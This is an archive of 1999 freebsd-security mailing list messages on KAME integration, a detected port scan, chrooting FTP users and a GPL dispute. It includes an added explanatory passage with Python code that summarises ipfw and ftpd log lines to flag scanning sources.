Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id EAA17854 for freebsd-security@FreeBSD.ORG; Sat, 24 Apr 1999 04:35:00 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr)
Received: by keltia.freenix.fr (Postfix, from userid 101) id 449428840; Sat, 24 Apr 1999 02:18:10 +0200 (CEST)
Date: Sat, 24 Apr 1999 02:18:10 +0200
From: Ollivier Robert
To: "freebsd-security FreeBSD.org"
Subject: Re: KAME integration
Message-ID: <19990424021810.A19209@keltia.freenix.fr>
Mail-Followup-To: "freebsd-security FreeBSD.org"
References: <000b01be8cd9$a53728c0$d3e4b38c@xyplex.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
User-Agent: Mutt/0.95.3i
In-Reply-To: <000b01be8cd9$a53728c0$d3e4b38c@xyplex.com>; from Rick Whitesel on Thu, Apr 22, 1999 at 12:03:21PM -0400
X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5244 AMD-K6 MMX @ 200 MHz
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

According to Rick Whitesel:
> Can anyone tell me the status of KAME integration into FreeBSD? It looks
> like Linux is going with FreeS/WAN and the other BSDs seem to be going with
> KAME or NRL.

There is still ongoing work by the INRIA/KAME/NRL guys to merge the three
stacks into one. More news in a few months I think.

--
Ollivier ROBERT -=- FreeBSD: The Power to Serve!
-=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 4.0-CURRENT #2: Fri Apr 16 22:37:03 CEST 1999

From owner-freebsd-security Sat Apr 24 9:44: 5 1999
Delivered-To: freebsd-security@freebsd.org
Received: from server.pentalpha.com.hk (unknown [210.176.109.29]) by hub.freebsd.org (Postfix) with ESMTP id 48F9514F76 for ; Sat, 24 Apr 1999 09:43:59 -0700 (PDT) (envelope-from danny@pentalpha.com.hk)
Received: from hing ([10.0.0.153]) by server.pentalpha.com.hk (8.9.1a/8.9.1) with SMTP id AAA12088 for ; Sun, 25 Apr 1999 00:43:58 +0800 (CST)
Message-ID: <007c01be8e71$a76c64e0$f439fea9@hing>
From: "danny"
To:
Subject: network scan
Date: Sun, 25 Apr 1999 00:43:59 +0800
MIME-Version: 1.0
Content-Type: text/plain; charset="big5"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2014.211
X-Mimeole: Produced By Microsoft MimeOLE V5.00.2014.211
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

From the system log, I found that someone tried to scan my server. How can
I stop him from doing it again?
Danny

Apr 24 19:33:30 server /kernel: ipfw: 14100 Deny TCP 203.93.49.252:2348 w.x.y.z:80 in via xl0
Apr 24 19:34:19 server /kernel: ipfw: 16000 Accept TCP 203.93.49.252:2421 w.x.y.z:21 in via xl0
Apr 24 19:34:26 server ftpd[36695]: refused connect from 203.93.49.252
Apr 24 19:34:32 server /kernel: ipfw: 26000 Deny UDP 203.93.49.252:1025 w.x.y.z:161 in via xl0

From owner-freebsd-security Sat Apr 24 12: 0:15 1999
Delivered-To: freebsd-security@freebsd.org
Received: from andyo.prime.net (P1M9.prime.net.ua [195.64.229.41]) by hub.freebsd.org (Postfix) with ESMTP id D46FB14BE0 for ; Sat, 24 Apr 1999 12:00:03 -0700 (PDT) (envelope-from andyo@prime.net.ua)
Received: from prime.net.ua (localhost [127.0.0.1]) by andyo.prime.net (8.9.3/8.9.3) with ESMTP id WAA00358 for ; Sat, 24 Apr 1999 22:01:21 +0300 (EET DST)
Message-ID: <372214FD.A0035005@prime.net.ua>
Date: Sat, 24 Apr 1999 22:01:18 +0300
From: Андрей В. Олейник (Andy V. Oleynik)
Reply-To: andyo@prime.net.ua
Organization: М-Инфо
X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 2.2.5-RELEASE i386)
X-Accept-Language: ru, uk, en
MIME-Version: 1.0
To: security@FreeBSD.ORG
Subject: Re: network scan
References: <007c01be8e71$a76c64e0$f439fea9@hing>
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

IPFW does it for U. Only thing U may take care about is ftpd which accepts
connections from the Internet. But if U've this service public U have only
to advance its security. Generally U may tcpdump xl0 for the pattern
src host 203.93.49.252 to be sure that this is not spoofed and contact the
corresponding responsible person to realize what happened.
BTW, lately on the Internet too many lamers appeared that used SATAN :)

danny wrote:

> From the system log, I found that someone tried to scan my server. How can I
> stop him from doing it again?
> Danny
>
> Apr 24 19:33:30 server /kernel: ipfw: 14100 Deny TCP 203.93.49.252:2348
> w.x.y.z:80 in via xl0
> Apr 24 19:34:19 server /kernel: ipfw: 16000 Accept TCP 203.93.49.252:2421
> w.x.y.z:21 in via xl0
> Apr 24 19:34:26 server ftpd[36695]: refused connect from 203.93.49.252
> Apr 24 19:34:32 server /kernel: ipfw: 26000 Deny UDP 203.93.49.252:1025
> w.x.y.z:161 in via xl0
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

--
Andy V. Oleynik
(When U aim for perfection,
U discover it's a moving target ö80)

From owner-freebsd-security Sat Apr 24 15:12:37 1999
Delivered-To: freebsd-security@freebsd.org
Received: from well.apcs.com.au (well.apcs.com.au [203.41.122.5]) by hub.freebsd.org (Postfix) with ESMTP id F3B7215088 for ; Sat, 24 Apr 1999 15:12:30 -0700 (PDT) (envelope-from keith@well.apcs.com.au)
Received: (from keith@localhost) by well.apcs.com.au (8.9.3/8.9.2) id IAA23647; Sun, 25 Apr 1999 08:06:15 +1000 (EST) (envelope-from keith)
Message-ID:
X-Mailer: XFMail 1.3 [p0] on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
In-Reply-To: <372214FD.A0035005@prime.net.ua>
Date: Sun, 25 Apr 1999 08:06:15 +1000 (EST)
Reply-To: keith@apcs.com.au
Organization: Australia Power Control Systems Pty Limited
From: Keith
To: (Andy V. Oleynik)
Subject: Re: network scan
Cc: security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi Andy

Please tell me more? "Generally U may tcpdump xl0 for the pattern" What is
this?

Keith

On 24-Apr-99 Andy V. Oleynik wrote:
> IPFW does it for U.
> Only thing U may take care about is
> ftpd which accepts connections from the Internet.
> But if U've this service public U have only
> to advance its security.
> Generally U may tcpdump xl0 for the pattern
> src host 203.93.49.252 to be sure that this
> is not spoofed and contact the corresponding
> responsible person to realize what happened.
> BTW, lately on the Internet too many lamers
> appeared that used SATAN :)
> danny wrote:
>
>> From the system log, I found that someone tried to scan my server. How can I
>> stop him from doing it again?
>> Danny
>>
>> Apr 24 19:33:30 server /kernel: ipfw: 14100 Deny TCP 203.93.49.252:2348
>> w.x.y.z:80 in via xl0
>> Apr 24 19:34:19 server /kernel: ipfw: 16000 Accept TCP 203.93.49.252:2421
>> w.x.y.z:21 in via xl0
>> Apr 24 19:34:26 server ftpd[36695]: refused connect from 203.93.49.252
>> Apr 24 19:34:32 server /kernel: ipfw: 26000 Deny UDP 203.93.49.252:1025
>> w.x.y.z:161 in via xl0
>>
>> To Unsubscribe: send mail to majordomo@FreeBSD.org
>> with "unsubscribe freebsd-security" in the body of the message
>
> --
> Andy V. Oleynik
> (When U aim for perfection,
> U discover it's a moving target ö80)
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

"The box said 'Requires Windows 95, NT, or better,' so I installed FreeBSD."

** The thing I like most about Windows 98 is...
** You can download FreeBSD with it!

----------------------------------
E-Mail: Keith
Australia Power Control Systems Pty. Limited.
Date: 25-Apr-99
Time: 08:04:58
Satellite Service 64K to 2Meg

This message was sent by XFMail
----------------------------------
What's the similarity between an air conditioner and a computer?
They both stop working when you open windows.
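To put Keith's question in concrete terms: the check Andy describes is a packet capture on the external interface restricted to one source, in tcpdump's own filter syntax `tcpdump -n -i xl0 src host 203.93.49.252`, to see whether the traffic from that address looks like a real host before contacting whoever is responsible for it. Before going that far, a defender usually wants a per-source summary of what the log actually shows, because three ports in one minute is a scan while one connect is noise. The Python below is an example added here, not code from any poster: it parses the ipfw kernel log lines and the ftpd line Danny quoted (plus one constructed line for an ordinary web client, so the report has a non-scanning source to compare against) and flags any source that touches several distinct ports inside a short sliding window. The thresholds and the helper names are my choices.

```python
"""Scan-pattern report over ipfw/ftpd syslog lines, as a defender would run
it before following Andy's advice to inspect the source with tcpdump.
Added example: not code from any poster. The regexes cover the two log
formats quoted above (FreeBSD 3.x ipfw kernel lines and ftpd's "refused
connect from"); lines in any other format are skipped."""
import re
from datetime import datetime

IPFW_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ /kernel: ipfw: (?P<rule>\d+) "
    r"(?P<verdict>Deny|Accept) (?P<proto>\w+) (?P<src>\S+):\d+ "
    r"(?P<dst>\S+):(?P<dport>\d+) (?P<dir>in|out) via (?P<iface>\S+)$")
FTPD_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ ftpd\[\d+\]: refused connect from (?P<src>\S+)$")

# Danny's four lines plus one constructed line (192.0.2.10) for a normal client.
SAMPLE_LOG = """\
Apr 24 19:33:30 server /kernel: ipfw: 14100 Deny TCP 203.93.49.252:2348 w.x.y.z:80 in via xl0
Apr 24 19:34:19 server /kernel: ipfw: 16000 Accept TCP 203.93.49.252:2421 w.x.y.z:21 in via xl0
Apr 24 19:34:26 server ftpd[36695]: refused connect from 203.93.49.252
Apr 24 19:34:32 server /kernel: ipfw: 26000 Deny UDP 203.93.49.252:1025 w.x.y.z:161 in via xl0
Apr 24 19:35:02 server /kernel: ipfw: 16000 Accept TCP 192.0.2.10:40001 w.x.y.z:80 in via xl0
""".splitlines()

def _stamp(ts: str) -> datetime:
    # syslog carries no year; the default (1900) is fine since only differences are used
    return datetime.strptime(ts, "%b %d %H:%M:%S")

def parse_events(lines):
    """Yield (time, src, (proto, dport) or None, denied) for every recognised line."""
    for line in lines:
        m = IPFW_RE.match(line)
        if m:
            yield _stamp(m["ts"]), m["src"], (m["proto"], int(m["dport"])), m["verdict"] == "Deny"
            continue
        m = FTPD_RE.match(line)
        if m:
            yield _stamp(m["ts"]), m["src"], None, True   # the daemon itself turned it away

def _max_ports_in_window(events, window_s):
    """Largest number of distinct (proto, port) targets seen from one source
    inside any window_s-second sliding window."""
    timed = sorted((t, port) for t, port in events if port is not None)
    best = 0
    for i, (t0, _) in enumerate(timed):
        seen = {port for t, port in timed[i:] if (t - t0).total_seconds() <= window_s}
        best = max(best, len(seen))
    return best

def scan_report(lines, window_s=120, min_ports=3):
    """Per-source summary. 'scan' is True when the source probed at least
    min_ports distinct ports within window_s seconds."""
    by_src = {}
    for t, src, port, denied in parse_events(lines):
        rec = by_src.setdefault(src, {"events": [], "denied": 0, "refused": 0})
        rec["events"].append((t, port))
        if port is None:
            rec["refused"] += 1
        elif denied:
            rec["denied"] += 1
    report = {}
    for src, rec in by_src.items():
        times = [t for t, _ in rec["events"]]
        report[src] = {
            "ports": sorted({p for _, p in rec["events"] if p is not None}),
            "denied": rec["denied"],
            "refused": rec["refused"],
            "span_s": (max(times) - min(times)).total_seconds(),
            "scan": _max_ports_in_window(rec["events"], window_s) >= min_ports,
        }
    return report
```

On the sample, 203.93.49.252 is reported with three targets (TCP 21, TCP 80, UDP 161) over 62 seconds, two firewall denies and one ftpd refusal, and is flagged; the constructed web client is not. Shrinking the window to 30 seconds drops the flag, which is the knob to tune against slow probes. The report is what you have in hand when you run the tcpdump capture Andy suggests and when you write to the address's contact.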
----------------------------------

From owner-freebsd-security Sat Apr 24 15:22: 2 1999
Delivered-To: freebsd-security@freebsd.org
Received: from chapman.karlskrona.se (chapman.karlskrona.se [195.84.83.130]) by hub.freebsd.org (Postfix) with ESMTP id 5F2EE15130 for ; Sat, 24 Apr 1999 15:21:59 -0700 (PDT) (envelope-from erik@chapman.karlskrona.se)
Received: from luke (dialup145-2-32.swipnet.se [130.244.145.96]) by chapman.karlskrona.se (8.9.2/8.9.2) with SMTP id AAA10355 for ; Sun, 25 Apr 1999 00:19:32 +0200 (CEST) (envelope-from erik@chapman.karlskrona.se)
Message-Id: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se>
X-Sender: erik@chapman.karlskrona.se
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32)
Date: Sun, 25 Apr 1999 00:19:44 +0200
To: freebsd-security@FreeBSD.org
From: erik
Subject: limit ftp users to their homedir
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

is there a way to deny a registered user access to anything but his own
home directory?

it would be nice if it was the same as with anonymous access.. ie. users
who cwd to "/" really enter the virtual ftp root instead of the real
system root.

is this possible to do with _non-anonymous_ users?

for example:

in a normal setup, when user foo ftps to the system, the initial directory
will be his home directory. when (for some reason) he cwds to "/" he will
enter the real system root. can you limit him to only access his own
stuff, ie. a cwd to / will bring him to /home/fred.

any suggestions appreciated!
/erik

From owner-freebsd-security Sat Apr 24 15:31: 3 1999
Delivered-To: freebsd-security@freebsd.org
Received: from relay.acadiau.ca (relay.acadiau.ca [131.162.2.90]) by hub.freebsd.org (Postfix) with ESMTP id BBD9C151E1 for ; Sat, 24 Apr 1999 15:31:00 -0700 (PDT) (envelope-from 026809r@dragon.acadiau.ca)
Received: from dragon.acadiau.ca (dragon.acadiau.ca [131.162.1.79]) by relay.acadiau.ca (8.8.5/8.8.5) with ESMTP id TAA22694; Sat, 24 Apr 1999 19:29:56 -0300 (ADT)
Received: from localhost (026809r@localhost) by dragon.acadiau.ca (8.8.8+Sun/8.8.8) with ESMTP id TAA24432; Sat, 24 Apr 1999 19:29:54 -0300 (ADT)
Date: Sat, 24 Apr 1999 19:29:54 -0300 (ADT)
From: Michael Richards <026809r@dragon.acadiau.ca>
X-Sender: 026809r@dragon
To: erik
Cc: security@freebsd.org
Subject: Re: limit ftp users to their homedir
In-Reply-To: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sun, 25 Apr 1999, erik wrote:

> is there a way to deny a registered user access to anything but his own
> homedirectory?

Yes, we do it with ProFTPD. Works quite well. Make sure you install the
latest version. I think the pre-release 1 had an exploit.

-Michael

From owner-freebsd-security Sat Apr 24 15:36:49 1999
Delivered-To: freebsd-security@freebsd.org
Received: from acetylene.vapornet.net (acetylene.vapornet.net [209.100.218.11]) by hub.freebsd.org (Postfix) with ESMTP id B03E6151E1 for ; Sat, 24 Apr 1999 15:36:47 -0700 (PDT) (envelope-from john@vapornet.net)
Received: from datapit.home.vapornet.net (vapornet.xnet.com.
[205.243.141.107]) by acetylene.vapornet.net (8.9.3/8.9.3/VaporServer 2.01) with ESMTP id RAA04550; Sat, 24 Apr 1999 17:36:52 -0500 (CDT) (envelope from: john@vapornet.net) Received: from habanero.chili-pepper.net (habanero.chili-pepper.net [192.168.0.11]) by datapit.home.vapornet.net (8.9.3/8.9.3/VaporServer 1.4) with ESMTP id RAA10907; Sat, 24 Apr 1999 17:37:10 -0500 (CDT) (envelope from: john@vapornet.net) Received: (from john@localhost) by habanero.chili-pepper.net (8.9.3/8.9.3/VaporClient v3.1) id RAA08751; Sat, 24 Apr 1999 17:36:40 -0500 (CDT) (envelope from: john@vapornet.net) From: John Preisler MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Sat, 24 Apr 1999 17:36:40 -0500 (CDT) To: erik Cc: freebsd-security@FreeBSD.ORG Subject: Re: limit ftp users to their homedir In-Reply-To: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se> References: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se> X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid Message-ID: <14114.18124.843396.946822@habanero.chili-pepper.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org add their login to /etc/ftpchroot or add the boolean "ftp-chroot" capability in login.conf as per the ftpd man page. -j erik writes: > > is there a way to deny a registered user access to anything but his own > homedirectory? > > it would be nice if it was the same as with anonymous access.. ie. users > who cwd to "/" , > really enters the virtual ftp root instead of the real system root. > > is this possible to do with _none anonymous_ users? > > for example: > > in a normal setup, when user foo ftps to the system, the initial directory > will be > his homedirectory. when (for some reason) he cwd to "/" he will enter the > real system root. > can you limit him to only access his own stuff, ie. a cwd to / will bring > him to /home/fred. > > any suggestions appreciated! 
> > /erik > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 24 18:14:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id EF9FE14C22 for ; Sat, 24 Apr 1999 18:14:27 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id TAA04952; Sat, 24 Apr 1999 19:11:47 -0600 (MDT) Message-Id: <4.2.0.32.19990424191010.04521e00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Sat, 24 Apr 1999 19:11:09 -0600 To: Michael Richards <026809r@dragon.acadiau.ca>, erik From: Brett Glass Subject: Re: limit ftp users to their homedir Cc: security@FreeBSD.ORG In-Reply-To: References: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Don't use ProFTPd; it's GPLed. The BSD ftpd is capable of chrooting users if you put their names in /etc/ftpchroot; see the man page. --Brett At 07:29 PM 4/24/99 -0300, Michael Richards wrote: >On Sun, 25 Apr 1999, erik wrote: > >> is there a way to deny a registered user access to anything but his own >> homedirectory? >Yes, we do it with ProFTPD. Works quite well. Make sure you install the >latest version. I think the pre-release 1 had an exploit. 
> >-Michael
> >
> >To Unsubscribe: send mail to majordomo@FreeBSD.org
> >with "unsubscribe freebsd-security" in the body of the message

"A man should learn to detect that gleam of light which flashes across his mind from within, more than the lustre of the firmament of bards and sages. Yet he dismisses without notice his thought, because it is his! In every work of genius we recognize our own rejected thoughts; they come back to us with a certain alienated majesty. Great works of art have no more affecting lesson than this: they teach us to abide by our spontaneous impression with good-humored inflexibility then most when the whole cry of voices is on the other side. Else, tomorrow a stranger will say with masterly good sense precisely what we have thought and felt all the time, and we shall be forced to take with shame our own opinion from another."
-- Ralph Waldo Emerson

From owner-freebsd-security Sat Apr 24 18:18:50 1999
Delivered-To: freebsd-security@freebsd.org
Received: from server.pentalpha.com.hk (unknown [210.176.109.29]) by hub.freebsd.org (Postfix) with ESMTP id 77C9714F4A for ; Sat, 24 Apr 1999 18:18:46 -0700 (PDT) (envelope-from danny@pentalpha.com.hk)
Received: from hing ([10.0.0.153]) by server.pentalpha.com.hk (8.9.1a/8.9.1) with SMTP id JAA12699; Sun, 25 Apr 1999 09:18:21 +0800 (CST)
Message-ID: <005001be8eb9$7f300520$fb97fea9@hing>
From: "danny"
To: ,
References: <007c01be8e71$a76c64e0$f439fea9@hing> <372214FD.A0035005@prime.net.ua>
Subject: Re: network scan
Date: Sun, 25 Apr 1999 09:18:15 +0800
MIME-Version: 1.0
Content-Type: text/plain; charset="koi8-r"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2014.211
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2014.211
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

"Generally U may to tcpdump xl0 for pattern" <- how can I do it?

Also, I found that 203.93.49.252 also scans my friend's network. How can I contact the corresponding responsible person to realize what happened?

Danny

----- Original Message -----
From: Андрей В. Олейник (Andy V. Oleynik)
To:
Sent: Sunday, April 25, 1999 3:01 AM
Subject: Re: network scan

> IPFW does it for U. Only thing U may take care about is ftpd which accepts connections from Internet. But if U've this service public U have only to advance its security.
>
> Generally U may to tcpdump xl0 for pattern
>     src host 203.93.49.252
> to be sure that this is not spoofed and contact corresponding responsible person to realize what happened.
>
> BTW, lately in the internet too much lammers appeared that used SATAN :)
>
> danny wrote:
> >
> > From the system log, I found that someone tried to scan my server. How can I stop him from doing it again?
> > Danny
> >
> > Apr 24 19:33:30 server /kernel: ipfw: 14100 Deny TCP 203.93.49.252:2348 w.x.y.z:80 in via xl0
> > Apr 24 19:34:19 server /kernel: ipfw: 16000 Accept TCP 203.93.49.252:2421 w.x.y.z:21 in via xl0
> > Apr 24 19:34:26 server ftpd[36695]: refused connect from 203.93.49.252
> > Apr 24 19:34:32 server /kernel: ipfw: 26000 Deny UDP 203.93.49.252:1025 w.x.y.z:161 in via xl0
>
> --
> Andy V.
Oleynik > (When U aim for perfection, > U discover it's a moving target ö80) > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 24 20:15:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.rdc1.sdca.home.com (ha1.rdc1.sdca.home.com [24.0.3.66]) by hub.freebsd.org (Postfix) with ESMTP id EDACF14CAA for ; Sat, 24 Apr 1999 20:15:38 -0700 (PDT) (envelope-from jay@doscher.com) Received: from [10.10.10.2] ([24.4.93.129]) by mail.rdc1.sdca.home.com (InterMail v4.00.03 201-229-104) with ESMTP id <19990425031538.UWDM6760.mail.rdc1.sdca.home.com@[24.4.93.129]>; Sat, 24 Apr 1999 20:15:38 -0700 X-Mailer: Microsoft Outlook Express Macintosh Edition - 4.5 (0410) Date: Sat, 24 Apr 1999 20:21:07 -0800 Subject: Re: limit ftp users to their homedir From: "Jay Doscher" To: Brett Glass , Michael Richards <026809r@dragon.acadiau.ca>, erik Cc: security@FreeBSD.ORG Mime-version: 1.0 X-Priority: 3 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Message-Id: <19990425031538.UWDM6760.mail.rdc1.sdca.home.com@[24.4.93.129]> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This may be a dumb question, but what in the heck is wrong with GPL software? I will concede that with the widely distributed version there is a security hole, but that is not true of all GPL software. What is your reasoning? jay doscher jay@doscher.com ---------- >From: Brett Glass >To: Michael Richards <026809r@dragon.acadiau.ca>, erik >Cc: security@FreeBSD.ORG >Subject: Re: limit ftp users to their homedir >Date: Sat, Apr 24, 1999, 5:11 PM > > Don't use ProFTPd; it's GPLed. The BSD ftpd is capable of chrooting users > if you put their names in /etc/ftpchroot; see the man page. 
> > --Brett > > > At 07:29 PM 4/24/99 -0300, Michael Richards wrote: >>On Sun, 25 Apr 1999, erik wrote: >> >>> is there a way to deny a registered user access to anything but his own >>> homedirectory? >>Yes, we do it with ProFTPD. Works quite well. Make sure you install the >>latest version. I think the pre-release 1 had an exploit. >> >>-Michael >> >> >> >>To Unsubscribe: send mail to majordomo@FreeBSD.org >>with "unsubscribe freebsd-security" in the body of the message > > > "A man should learn to detect that gleam of light which flashes across his > mind from within, more than the lustre of the firmament of bards and sages. > Yet he dismisses without notice his thought, because it is his! In every > work of genius we recognize our own rejected thoughts; they come back to us > with a certain alienated majesty. Great works of art have no more affecting > lesson than this: they teach us to abide by our spontaneous impression with > good-humored inflexibility then most when the whole cry of voices is on the > other side. Else, tomorrow a stranger will say with masterly good sense > precisely what we have thought and felt all the time, and we shall be > forced to take with shame our own opinion from another." 
> > -- Ralph Waldo Emerson > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 24 20:38:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id D069A14A2D for ; Sat, 24 Apr 1999 20:38:11 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id VAA05866; Sat, 24 Apr 1999 21:35:28 -0600 (MDT) Message-Id: <4.2.0.32.19990424213135.0452f720@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Sat, 24 Apr 1999 21:34:36 -0600 To: "Jay Doscher" , Michael Richards <026809r@dragon.acadiau.ca>, erik From: Brett Glass Subject: Re: limit ftp users to their homedir Cc: security@FreeBSD.ORG In-Reply-To: <19990425031538.UWDM6760.mail.rdc1.sdca.home.com@[24.4.93.1 29]> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The stated design purpose of the GPL is to destroy businesses that sell commercial software, as well as programmers' livelihoods. This is a spiteful, vindictive goal that professional programmers -- not to mention consumers who would like to have the choice of buying commercial software -- should not promote. See Richard Stallman's writings, in particular, "The GNU Manifesto" and "Why Software Should Not Have Owners," for more. --Brett Glass At 08:21 PM 4/24/99 -0800, Jay Doscher wrote: >This may be a dumb question, but what in the heck is wrong with GPL >software? 
I will concede that with the widely distributed version there is >a security hole, but that is not true of all GPL software. What is your >reasoning? > > >jay doscher >jay@doscher.com "You're not just e-mailing her, you're e-mailing anyone she's ever e-mailed." -- Dayton Daily News Cartoonist Mike Peters on the "Melissa virus" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 24 20:45:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from trump.amber.org (trump.amber.org [209.31.146.82]) by hub.freebsd.org (Postfix) with ESMTP id C031814A2D for ; Sat, 24 Apr 1999 20:45:25 -0700 (PDT) (envelope-from petrilli@amber.org) Received: by trump.amber.org (Postfix, from userid 1000) id AEC691860C; Sat, 24 Apr 1999 23:46:04 -0400 (EDT) Message-ID: <19990424234604.J11094@amber.org> Date: Sat, 24 Apr 1999 23:46:04 -0400 From: Christopher Petrilli To: Brett Glass Cc: security@freebsd.org Subject: Re: limit ftp users to their homedir References: <19990425031538.UWDM6760.mail.rdc1.sdca.home.com@[24.4.93.1 29]> <4.2.0.32.19990424213135.0452f720@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <4.2.0.32.19990424213135.0452f720@localhost>; from Brett Glass on Sat, Apr 24, 1999 at 09:34:36PM -0600 X-Disclaimer: I hardly speak for myself, muchless anyone else. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Can we please take the religion OFF the security list... it's just not relevent. 
Chris
--
| Christopher Petrilli    ``Television is bubble-gum for
| petrilli@amber.org        the mind.''-Frank Lloyd Wright

From owner-freebsd-security Sun Apr 25 1:32:38 1999
Delivered-To: freebsd-security@freebsd.org
Received: from acetylene.vapornet.net (acetylene.vapornet.net [209.100.218.11]) by hub.freebsd.org (Postfix) with ESMTP id E9A5C150C3 for ; Sun, 25 Apr 1999 01:32:35 -0700 (PDT) (envelope-from john@vapornet.net)
Received: from datapit.home.vapornet.net (vapornet.xnet.com. [205.243.141.107]) by acetylene.vapornet.net (8.9.3/8.9.3/VaporServer 2.01) with ESMTP id DAA06423; Sun, 25 Apr 1999 03:32:30 -0500 (CDT) (envelope from: john@vapornet.net)
Received: from habanero.chili-pepper.net (habanero.chili-pepper.net [192.168.0.11]) by datapit.home.vapornet.net (8.9.3/8.9.3/VaporServer 1.4) with ESMTP id DAA12476; Sun, 25 Apr 1999 03:32:29 -0500 (CDT) (envelope from: john@vapornet.net)
Received: (from john@localhost) by habanero.chili-pepper.net (8.9.3/8.9.3/VaporClient v3.1) id DAA09485; Sun, 25 Apr 1999 03:32:27 -0500 (CDT) (envelope from: john@vapornet.net)
From: John Preisler
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Date: Sun, 25 Apr 1999 03:32:27 -0500 (CDT)
To: erik
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: limit ftp users to their homedir
In-Reply-To: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se>
References: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se>
X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid
Message-ID: <14114.53550.598471.753465@habanero.chili-pepper.net>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I can't find the request I just got for this info, but in order to have this capability from login.conf(5) what you need to do is:

1. cd into src/libexec/ftpd

2. [assuming a Bourne shell]
     $ export FTPD_INTERNAL_LS=true
     $ make install clean

